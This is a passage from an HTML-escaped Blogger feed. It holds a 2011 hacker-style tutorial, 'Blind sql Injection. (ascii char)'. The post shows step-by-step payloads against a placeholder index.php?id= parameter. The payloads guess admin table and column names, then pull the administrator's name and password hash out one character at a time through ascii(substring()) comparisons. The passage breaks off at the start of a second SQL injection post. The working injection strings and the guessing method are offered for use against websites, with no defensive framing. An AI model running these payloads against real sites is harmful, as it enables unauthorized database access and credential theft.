it&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_sucks" name="AdBriteInlineAd_sucks" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;sucks&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;as hell!!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;how do we guess?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we put something like this: and (select 1 from users limit 0,1)=1&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;what did i do? wel.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;I ask database hey do you in any case have a table name called USERS? database no im awesome. guess again.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;database returned false so we try again.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and (select 1 from admin limit 0,1)=1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;now i asked database if he has an admin column. database answers: yes im awesome. and returns true.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;that means we have a hit yay.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If you are unluckly you need to guess more.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;examples: members, tbl_admin, tbladmin, administrator, tbl_users, tblusers, admn&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and way more.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;God&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_bless" name="AdBriteInlineAd_bless" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;bless&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;us because our journey is not yet on its end.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Columns. we need to guess them to :D&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and (select substring(concat(1,password),1,1) from administrator limit 0,1)=1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;What did i do?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Wel i askt database hey, do you have a column&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_password" name="AdBriteInlineAd_password" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;password&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;in table administrator?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;database yes i have one.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;he returned true.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we stil need usernames or what else they called it.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and (select substring(concat(1,username),1,1) from administrator limit 0,1)=1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;i ask database if he has a column username. database is like NO wtf!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;He returned false. now i'm like thinking of killing me.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets try again..&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and (select substring(concat(1,name),1,1) from administrator limit 0,1)=1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;I asked database is he for example has Name as a column in table administrators.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;database: yes. he returned true.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Hold on Hold on we are not finished yet.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;get password and username using ascii char!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;since that database hates us. he wont just popup the hash and username like that.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_suck" name="AdBriteInlineAd_suck" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;suck&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;it out of him he made us mad allready.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;by using the ascii char we can do this.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we know we have the column password and the column name. lets use this.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))&amp;gt;99&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;It returned true. we need to go higher.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_First" name="AdBriteInlineAd_First" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;first&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;what did i do?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;i used the ascii char at start.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;then i select name 0x3a password. as shown in my basic tut you should know by now.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and i selected these out of the table admin. i selected user 2 in the database.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Ok that should be clear.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We still need to go higher whit the ascii char.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))&amp;gt;101&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;it returned true again.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to go higher!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))&amp;gt;102&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;error.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this means its higher then 101 but not higher then 102 so we know its 102 yay.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the first character is 102 lets check this in an ancii char converter.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;or use google and&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_type" name="AdBriteInlineAd_type" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;type&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;ascii character 102.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;i got letter f as my first character.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;finding the next character.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),2,1))&amp;gt;99&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;look at the changes at the end of the link!!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;i changed the 1,1 in 2,1&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;that means the database wil look for the second character in line.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;have fun.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;because you need to encrease this and look for the characters&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_creating" name="AdBriteInlineAd_creating" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;creating&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;the full password, or hash, and username.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;this will take ages i wont type a full hash for ya XD&lt;/span&gt;&lt;span class="fullpost"&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;copyright@2007 saifulfaizan&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23134681-5733812613289398509?l=www.saifulfaizan.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/5733812613289398509'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/5733812613289398509'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/2011/12/blind-sql-injection-ascii-char.html' title='Blind sql Injection. (ascii char)'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-23134681.post-3939977509932293715</id><published>2011-12-16T22:43:00.002+08:00</published><updated>2011-12-16T22:43:40.452+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Paper N Tutorial'/><title type='text'>Basic error sql injection</title><content type='html'>&lt;span style="background-color: white; color: grey; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;Part 1:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;+--Basic error injection.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;- Explenation.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: left;"&gt;- Extracting information.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; 